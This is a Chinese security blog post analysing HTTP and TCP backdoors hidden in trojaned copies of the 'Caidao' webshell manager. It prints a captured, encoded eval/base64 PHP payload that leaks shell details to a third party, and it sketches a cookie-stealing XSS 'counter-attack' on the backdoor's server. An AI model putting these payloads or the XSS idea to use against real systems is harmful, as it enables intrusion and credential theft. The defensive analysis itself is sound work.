菜刀HTTPTCP后门分析+防范

“菜刀”对于渗透测试者来说耳熟能详，但是大家用的菜刀真的安全吗？你能保证你所使用的工具不会被别人偷偷的塞入后门吗？

如果菜刀中被塞入后门那我们岂不是成了别人的苦力。辛辛苦苦打下的shell就这样不知不觉的被别人窃取，怎能好意思说自己是一名”小黑客”呢!

所以我从网上分别找到两个带有HTTP后门及TCP后门的菜刀，教给大家如何去分析及防范提权工具中的后门。

一.HTTP后门菜刀

HTTP后门是最容易发现的后门了，我们只需要抓一个包，再对数据包的内容进行解密，及可得到幕后黑手的后门地址。
我们在本地phpstudy上写一个一句话木马，并且让带有后门的菜刀去链接我们的一句话hez.php，同时对后门菜刀进行抓包。

这里我们对第四个包进行分析，因为我们在包的内容里面发现了我们一句话木马的密码后面跟了一串URL编码的数据。

数据如下：

hackxxx=624_23Dstrrev%28edoced_46esab829%3B%4Beva128%24_%28%24_POST%5Bz8%5D%29%29% 3B&z0=QGU2YwwoYmFZZTY8K2RRUND1NU1UWYkoweDUnN1UuMFRNFOU1TbDdjNlYwWTISdnEybGxLQ2R NZUd SbEp5d3hLUHRBWm1sc1pTz 25hSFIwY SRudkwZzZDNKeRRTGISZ1UwMa1ZTU31.U1JMR1ZSUK5UMDFIWU1NTZGRNaWNtvUdGenN6NG5NbXRs2UNna1qxQ1BUNUFwS1R8OScpKTtAaW5pX3NIdCgizGl2cGxheW91. nJvcnMiLCIuIik7QHN1dF9Saw1 lX2xpbw18KDAp08BzZXRFbWFnaWNFcXUudCUzX3J1bnRpbWUoNCk7ZWNobygiLT58Iik70gREPMRpcmn5hbWUOJF9TRUMRUJt I 1NDUk1QUF9GSUxFTkFNRSJdKT tp2igkRD89TiIp4EQ9Z61ybnF t2SgkXI1NFU1HNYnNCcigkRCwwL DEpIT@iLyIpe22vcmUh2gocnF uZ2oIkEiLc.alikgYXMNgJEwpaWoaXNYZGlyKCJ7JEOi1pKSRSL j sieyRMFToi03 8kUi4911.0l jskdT oZnUU'3Rpb25fZXhpcBRzKCdwB3HpeF9nZXR1221kJykpPBBwb3NpeF9nzXRwd30pZChacG9zaXhf2208zX0pzCgpKTonJzskdXNyPSgkdSk% 2FJHUbJ25hbWUnX

我们对数据进行url解码：

发现这里可以进行base64解码：

这里解码后我们发现还可以进行一次base64解码：

经过三次解码后，我们找到了后门的地址。

菜刀TCP后门：

这种后门就比较恶心了，因为通过单纯的抓包是不会被发现的。所以我们必须使用另一个工具对整个网路中的可执行程序进行监听。这里推荐使用Microsoft Network Monitor 3.4工具进行监听。PS：如果不能设置网卡可以使用管理员身份打开。

新建工程后点击start开始监听，同时让带有TCP后门的菜刀链接自己的一句话木马。

我们发现我们的服务器向一个很可疑的网址发送了一堆TCP和HTTP数据包
对可疑网站的域名进行解析，发现对方IP为192.126.xxx.xxx PS：这并不是内网IP
对该IP进行查询发现对方服务器在美国

于是我们再继续往下看，发现一条HTTP数据包

从中得知对方后门地址为www.xxx.xyz/1dex.asp

所以我们尝试去访问一下：发现访问不到但是可以正常访问对方服务器

这里也不清楚问题出在哪，可能是被调试了吧~

那么我们已经知道我们的提权工具存在后门了该怎样避免呢？

我们只需打开host文件将里面的数据修改为127.0.01 "后门网址"

这样我们的电脑访问后门的时候就相当于访问本机了，致使对方后门失效。

反杀：

我们再回过头来看第一个HTTP后门，发现后门地址后紧跟url传参。
反杀思路：我们是不是可以构造这样一条连接www.xxx.com?Url=<script>alert(1)</script>中间的js语句可以构造反弹cookie的代码，这样当对方登录的时候是不是就可以窃取到cookie了呢？当然要考虑到对方服务器上是否开启拦截是否有安全狗等问题……

申明：本账号所分享内容仅用于网络安全技术讨论，切勿用于违法途径，所有渗透都需获取授权，违者后果自行承担，与本号及作者无关，请谨记守法。

免费领取安全学习资料包！

渗透工具